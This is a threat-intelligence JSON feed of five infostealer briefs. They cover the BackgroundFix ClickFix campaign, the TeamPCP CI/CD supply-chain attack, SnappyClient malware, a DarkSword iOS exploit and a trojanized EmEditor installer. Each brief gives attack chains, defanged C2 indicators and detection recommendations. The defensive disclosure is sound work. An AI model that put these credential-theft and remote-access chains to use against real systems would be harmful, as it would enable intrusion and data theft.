{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/infostealer/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Windows","Microsoft 365","Google Workspace"],"_cs_severities":["high"],"_cs_tags":["clickfix","malware","social-engineering","rat","infostealer","castleloader","netsupport"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe BackgroundFix campaign is a social engineering scheme using fake \u0026ldquo;remove your photo background\u0026rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. This campaign appears to be active, with multiple domains sharing the same template.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictim searches for an online background removal tool and lands on a malicious BackgroundFix site.\u003c/li\u003e\n\u003cli\u003eThe victim uploads an image to the fake website.\u003c/li\u003e\n\u003cli\u003eAfter clicking a checkbox, the site instructs the victim to copy a command to their clipboard.\u003c/li\u003e\n\u003cli\u003eThe copied command executes \u003ccode\u003efinger.exe\u003c/code\u003e to query \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efinger.exe\u003c/code\u003e retrieves a batch script from the C2 server.\u003c/li\u003e\n\u003cli\u003eThe batch script executes commands to download and execute further payloads.\u003c/li\u003e\n\u003cli\u003eCastleLoader is deployed, subsequently dropping NetSupport RAT and CastleStealer.\u003c/li\u003e\n\u003cli\u003eNetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activities, including financial fraud, identity theft, and unauthorized access to sensitive accounts. The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efinger.exe\u003c/code\u003e with command-line arguments pointing to external domains (IOC: \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of \u003ccode\u003efinger.exe\u003c/code\u003e to identify potential initial access attempts.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e at the DNS resolver to prevent initial payload delivery.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: \u003ccode\u003eporonto[.]com:688\u003c/code\u003e, \u003ccode\u003egiovettiadv[.]com:688\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T13:00:00Z","date_published":"2026-04-30T13:00:00Z","id":"/briefs/2026-04-clickfix-backgroundfix/","summary":"The 'BackgroundFix' ClickFix campaign uses social engineering to trick victims into downloading malware disguised as a free image-editing tool, leading to the deployment of CastleLoader, NetSupport RAT for remote access, and CastleStealer for credential theft.","title":"ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer","url":"https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","ci/cd","infostealer"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eTeamPCP is conducting a supply chain attack targeting multiple companies through the compromise of their CI/CD pipelines and GitHub accounts. The attack involves an infostealer designed to harvest sensitive information such as credentials from CI environments, contents of .env files, and cloud tokens. The compromised credentials allowed the attackers to gain unauthorized access and potentially inject malicious code into the software development lifecycle. The attack has impacted projects including Trivy, KICS, and LiteLLM, suggesting a broad targeting scope within the software development and cloud security sectors. This type of attack poses a significant risk to the integrity and security of the software supply chain, as compromised code can be distributed to numerous downstream users.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of a developer\u0026rsquo;s machine or CI/CD environment via an unspecified initial access vector.\u003c/li\u003e\n\u003cli\u003eDeployment of an infostealer binary onto the compromised system.\u003c/li\u003e\n\u003cli\u003eThe infostealer scans the local file system for .env files containing sensitive credentials.\u003c/li\u003e\n\u003cli\u003eThe infostealer targets CI/CD environment variables to extract API keys, tokens, and other secrets.\u003c/li\u003e\n\u003cli\u003eThe infostealer searches for cloud tokens, potentially targeting AWS credentials, Azure service principals, or GCP service account keys.\u003c/li\u003e\n\u003cli\u003eExtracted credentials are used to gain unauthorized access to GitHub accounts and CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eAttackers inject malicious code or dependencies into the targeted projects, potentially leading to supply chain contamination.\u003c/li\u003e\n\u003cli\u003eCompromised code is distributed to downstream users of Trivy, KICS, LiteLLM, and other impacted projects.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe TeamPCP supply chain attack has impacted multiple companies and projects, including Trivy, KICS, and LiteLLM. The compromise of CI/CD pipelines and GitHub accounts allows attackers to inject malicious code into software projects, potentially affecting thousands of users. This can lead to data breaches, malware infections, and erosion of trust in the affected software. The exact number of victims is unknown, but the impact is significant due to the widespread use of the compromised projects in the cloud security and development sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) on all GitHub accounts and CI/CD pipelines to prevent unauthorized access.\u003c/li\u003e\n\u003cli\u003eRotate API keys and tokens regularly, especially those used in CI/CD environments, to minimize the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eImplement secrets scanning in CI/CD pipelines to prevent accidental exposure of sensitive information in code repositories.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Infostealer Activity in CI/CD Environments\u0026rdquo; to identify suspicious processes accessing environment variables.\u003c/li\u003e\n\u003cli\u003eMonitor file system access for unusual reads of .env files, using the \u0026ldquo;Detect .env File Access\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect anomalous connections originating from CI/CD servers or developer workstations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-teampcp-supply-chain/","summary":"TeamPCP compromised CI/CD pipelines and GitHub accounts of multiple companies by deploying an infostealer to extract credentials from CI environments, .env files, and cloud tokens, impacting projects like Trivy, KICS, and LiteLLM.","title":"TeamPCP Supply Chain Attack via CI/CD Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["snappyclient","hijackloader","malware","infostealer","keylogger"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSnappyClient is a sophisticated malware delivered via HijackLoader, a known malware distribution platform. The malware exhibits a wide array of capabilities, indicative of its intent to compromise systems and exfiltrate sensitive data. These capabilities include screenshot capture, keylogging, establishing a remote terminal for interactive command execution, and targeted data theft from web browsers, browser extensions, and other applications. The combination of these functions points towards a threat actor focused on credential harvesting, data collection, and maintaining persistent access through remote command and control. Defenders should prioritize detection and prevention measures to mitigate the risk of SnappyClient infections. The initial report of this activity was published in March 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: HijackLoader infects the system (delivery mechanism unspecified).\u003c/li\u003e\n\u003cli\u003ePersistence: HijackLoader establishes persistence to ensure SnappyClient is executed upon system reboot.\u003c/li\u003e\n\u003cli\u003eMalware Deployment: HijackLoader deploys and executes the SnappyClient malware.\u003c/li\u003e\n\u003cli\u003eScreenshot Capture: SnappyClient begins capturing screenshots of the user\u0026rsquo;s desktop activity using built-in OS functions.\u003c/li\u003e\n\u003cli\u003eKeylogging: SnappyClient logs keystrokes to capture sensitive information such as usernames, passwords, and financial details.\u003c/li\u003e\n\u003cli\u003eBrowser Data Theft: SnappyClient targets web browsers and their extensions to steal cookies, saved credentials, and browsing history.\u003c/li\u003e\n\u003cli\u003eRemote Terminal: SnappyClient establishes a remote terminal, granting the attacker interactive command execution capabilities.\u003c/li\u003e\n\u003cli\u003eData Exfiltration: Stolen data is exfiltrated to a command and control server controlled by the attacker.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful SnappyClient infections can result in significant data breaches, including the compromise of sensitive credentials, financial information, and personal data. The remote terminal functionality allows attackers to perform arbitrary actions on compromised systems, potentially leading to further damage or lateral movement within the network. While the number of victims and specific sectors targeted are unknown, the malware\u0026rsquo;s capabilities make it a high-risk threat to organizations of all sizes.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to enhance visibility into HijackLoader and SnappyClient execution (logsource: process_creation).\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect and block connections to known HijackLoader command and control infrastructure.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect SnappyClient activity and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor registry modifications for persistence mechanisms used by HijackLoader to launch SnappyClient (logsource: registry_set).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:19:06Z","date_published":"2026-03-20T05:19:06Z","id":"/briefs/2024-01-08-snappyclient/","summary":"SnappyClient is a multi-functional malware delivered via HijackLoader that steals data from browsers, takes screenshots, logs keystrokes, and establishes a remote terminal for attacker command and control.","title":"SnappyClient Malware Delivered via HijackLoader","url":"https://feed.craftedsignal.io/briefs/2024-01-08-snappyclient/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["ios","exploit","infostealer","darksword"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA new iOS exploit named \u0026ldquo;DarkSword\u0026rdquo; has been identified as being actively used in infostealer attacks against iPhones. While the specific details of the exploit remain limited in the provided source, its use signifies a significant threat to iOS users. The attackers are leveraging this exploit to potentially bypass security measures and gain unauthorized access to sensitive information stored on targeted devices. The lack of specific details regarding the exploit\u0026rsquo;s technical aspects and targeted iOS versions makes it challenging to implement precise detection and mitigation strategies. However, the active exploitation necessitates immediate attention and proactive measures to safeguard iOS devices from potential compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attack begins with an unknown initial access vector, potentially involving malicious links or app sideloading techniques, leading to the execution of the DarkSword exploit.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploit Execution:\u003c/strong\u003e The DarkSword exploit is executed on the targeted iPhone, leveraging an unspecified vulnerability within the iOS operating system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e Successful exploitation leads to privilege escalation, granting the attacker elevated permissions on the compromised device.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInfostealer Installation:\u003c/strong\u003e The attacker leverages the escalated privileges to install an infostealer payload onto the device.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e The infostealer malware collects sensitive data, including contacts, messages, photos, and potentially credentials stored on the iPhone.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Staging:\u003c/strong\u003e The collected data is staged for exfiltration, potentially compressed and encrypted to evade detection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand and Control (C2) Communication:\u003c/strong\u003e The malware establishes a connection with a remote C2 server to receive further instructions and prepare for data exfiltration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The stolen data is exfiltrated from the compromised iPhone to the attacker\u0026rsquo;s C2 server via an encrypted channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of the DarkSword exploit and deployment of the infostealer can lead to severe consequences for iPhone users. Stolen data can be used for identity theft, financial fraud, or other malicious purposes. The potential compromise of sensitive information stored on iPhones makes this a high-priority threat, impacting potentially a large number of users depending on the scope of the campaign.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections from iOS devices, which may indicate C2 communication (log source: network_connection).\u003c/li\u003e\n\u003cli\u003eImplement a Mobile Threat Defense (MTD) solution capable of detecting and blocking exploit attempts and malicious app installations on iOS devices.\u003c/li\u003e\n\u003cli\u003eEncourage users to avoid sideloading apps from untrusted sources, as this increases the risk of installing malware (awareness training).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect suspicious process execution patterns indicative of exploit activity (Sigma rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T19:08:08Z","date_published":"2026-03-19T19:08:08Z","id":"/briefs/2026-03-darksword-ios-exploit/","summary":"A new exploit dubbed 'DarkSword' is being actively exploited in infostealer campaigns targeting iPhones, potentially leading to unauthorized data access and device compromise.","title":"DarkSword iOS Exploit Used in Infostealer Attack","url":"https://feed.craftedsignal.io/briefs/2026-03-darksword-ios-exploit/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","infostealer","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA supply chain compromise involving the EmEditor text editor led to the distribution of a trojanized installer. Attackers replaced the legitimate EmEditor installer with a malicious version containing an infostealer. This compromised installer was then distributed through trusted or official channels, deceiving users into installing the malware. This incident underscores the importance of verifying software integrity, even when obtained from seemingly reputable sources, and highlights the potential for significant damage when software supply chains are targeted. The goal is to steal sensitive information from victim machines. Defenders should focus on detecting anomalous process execution and network activity following software installations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises the EmEditor software supply chain.\u003c/li\u003e\n\u003cli\u003eA malicious EmEditor installer is created, embedding an infostealer payload.\u003c/li\u003e\n\u003cli\u003eThe trojanized installer is distributed through trusted or official EmEditor distribution channels.\u003c/li\u003e\n\u003cli\u003eUnsuspecting users download and execute the malicious installer on their Windows systems.\u003c/li\u003e\n\u003cli\u003eThe installer executes the infostealer payload in the background.\u003c/li\u003e\n\u003cli\u003eThe infostealer collects sensitive information such as credentials, browser data, and other valuable data.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to a command-and-control server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen information for further malicious activities, such as account compromise or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe EmEditor supply chain compromise resulted in the distribution of an infostealer to an unknown number of users. Victims who downloaded and installed the trojanized EmEditor installer had their sensitive information stolen, potentially leading to financial loss, identity theft, and further compromise of their systems and accounts. The software supply chain compromise can erode trust in legitimate software vendors and distribution channels.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement robust software integrity verification mechanisms, such as checking digital signatures and file hashes, before installing any software (reference: overview).\u003c/li\u003e\n\u003cli\u003eMonitor for unusual process execution and network connections after software installations to detect potential post-compromise activity (reference: attack chain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential infostealer activity and malicious installer execution (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T00:00:00Z","date_published":"2026-03-19T00:00:00Z","id":"/briefs/2026-03-emeditor-supply-chain/","summary":"A trojanized EmEditor installer was distributed through a trusted source, delivering an infostealer, highlighting how attackers exploit legitimate software distribution channels to bypass user trust and security controls.","title":"EmEditor Supply Chain Compromise Delivering Infostealer","url":"https://feed.craftedsignal.io/briefs/2026-03-emeditor-supply-chain/"}],"language":"en","title":"CraftedSignal Threat Feed — Infostealer","version":"https://jsonfeed.org/version/1.1"}